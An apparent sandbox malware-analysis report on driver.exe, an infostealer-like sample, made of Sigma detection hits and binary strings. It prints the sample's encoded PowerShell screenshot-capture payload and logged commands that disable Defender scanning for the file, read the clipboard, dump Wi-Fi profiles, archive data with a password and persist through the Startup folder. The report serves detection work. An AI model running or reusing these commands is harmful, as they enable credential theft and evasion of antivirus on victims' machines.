JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7368, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\driver.exe, ProcessId: 6620, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\driver.exe, ProcessId: 6620, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\driver.exe, ProcessId: 6620, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3560, TargetFilename: C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7972, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *, ProcessId: 7200, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1472, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe', ProcessId: 2128, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2568, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7740, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: driver.exe	Virustotal: Detection: 43%			Perma Link
Source: driver.exe	ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe

Code function: 77_2_00007FF75425901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

77_2_00007FF75425901C

Source: driver.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053584283.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: driver.exe, 00000000.00000003.2050573747.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: driver.exe, 00000002.00000002.2452292275.00007FF8A8EF1000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050305577.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052687607.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053185543.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051305695.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053261566.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050911487.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053107068.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: driver.exe, 00000002.00000002.2455137415.00007FF8B8F71000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053185543.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052114302.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053891584.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050107027.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052770906.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052032548.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: driver.exe, 00000002.00000002.2454712947.00007FF8B8B3B000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052283988.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050482974.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: driver.exe, 00000002.00000002.2449988563.00007FF8A8BD9000.00000040.00000001.01000000.00000005.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053107068.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053891584.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050744012.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052687607.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: driver.exe, 00000000.00000003.2052601392.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052032548.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: driver.exe, 00000000.00000003.2049030918.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2456490547.00007FF8B9F74000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: driver.exe, 00000000.00000003.2051216435.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052448279.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053818515.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: driver.exe, 00000000.00000003.2052186692.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050305577.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051128075.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2051216435.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051451471.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: driver.exe, 00000002.00000002.2456731347.00007FF8BA4F1000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052365271.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050107027.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053499525.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2054053292.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052527881.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051019921.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052365271.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: driver.exe, driver.exe, 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053261566.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053818515.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: driver.exe, 00000002.00000002.2452820005.00007FF8B7E11000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053342813.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051305695.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053705049.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: driver.exe, 00000002.00000002.2448164791.00007FF8A84C2000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: driver.exe, 00000000.00000003.2049030918.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2456490547.00007FF8B9F74000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.pdb source: powershell.exe, 0000002F.00000002.2261891481.0000028F80385000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052849472.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050911487.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052527881.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053425753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
